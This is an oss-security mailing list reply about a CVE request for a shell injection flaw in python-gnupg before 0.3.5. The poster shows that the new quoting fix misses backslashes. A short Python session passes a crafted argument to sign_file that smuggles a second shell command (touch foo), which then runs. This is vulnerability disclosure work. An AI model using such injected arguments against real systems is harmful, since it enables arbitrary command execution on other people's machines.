Date: Tue, 4 Feb 2014 23:27:34 +1300 From: Matthew Daley <mattd@...fuzz.com> To: oss-security@...ts.openwall.com Subject: Re: CVE request: python-gnupg before 0.3.5 shell injection On Tue, Feb 4, 2014 at 11:04 PM, Henri Salo <henri@...v.fi> wrote: > On Tue, Feb 04, 2014 at 10:35:46AM +0100, Hanno Böck wrote: >> python-gnupg 0.3.5 lists in the changelog: >> "Added improved shell quoting to guard against shell injection." >> >> Sounds like a severe security issue, but further info is lacking. > > Diff attached. New function shell_quote() seems to represent major changes to > shell input quoting against unsafe input. > [...] This appears to (at least) miss escaping of backslashes: $ ls foo ls: cannot access foo: No such file or directory $ python Python 2.7.6 (default, Jan 11 2014, 14:34:26) [GCC 4.8.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import gnupg >>> gnupg.GPG().sign_file(open("/dev/null"), "'\\\"; touch foo #'") <gnupg.Sign object at 0x7fb3dbfad7d0> >>> $ ls foo foo - Matthew
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ